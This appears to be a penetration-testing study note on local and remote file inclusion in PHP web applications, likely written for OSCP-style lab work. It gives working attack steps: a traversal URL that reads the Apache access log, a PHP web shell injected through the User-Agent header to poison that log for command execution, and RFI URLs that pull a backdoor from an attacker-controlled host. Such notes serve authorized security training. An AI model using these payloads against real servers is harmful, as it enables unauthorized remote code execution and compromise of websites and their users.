> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/lfi-and-rfi.md).

# LFI & RFI

## Local File Inclusion

Directory traversal is used to **read** the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to **include** a file in the application’s running code allowing use to execute local or remote files

### Log Injection

Display contents of a log file (if dir traversal is present)

```
http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log
```

It should have something like the following

```
10.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php
HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0"
```

We can then edit the User-Agent to the following in Burp for RCE

```php
<?php echo system($_GET['cmd']); ?>
```

Now when we request the access log and add our command with the `cmd` parameter it will execute

```
http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log&cmd=whoami
```

{% hint style="info" %}
Windows apache logs located at `C:\xampp\apache\logs\`
{% endhint %}

## Remote File Inclusion

Same concept as LFI except with remote files that can be accessed over HTTP or SMB. The `allow_url_include` options needs to be enabled within the PHP application to leverage this.

```
/usr/share/webshells/php/simple-backdoor.php
```

```
http://adot.com/app/index.php?page=http://10.10.14.10/simple-backdoor.php&cmd=whoami
http://adot.com/app/index.php?page=http://10.10.14.10/shell.php
```
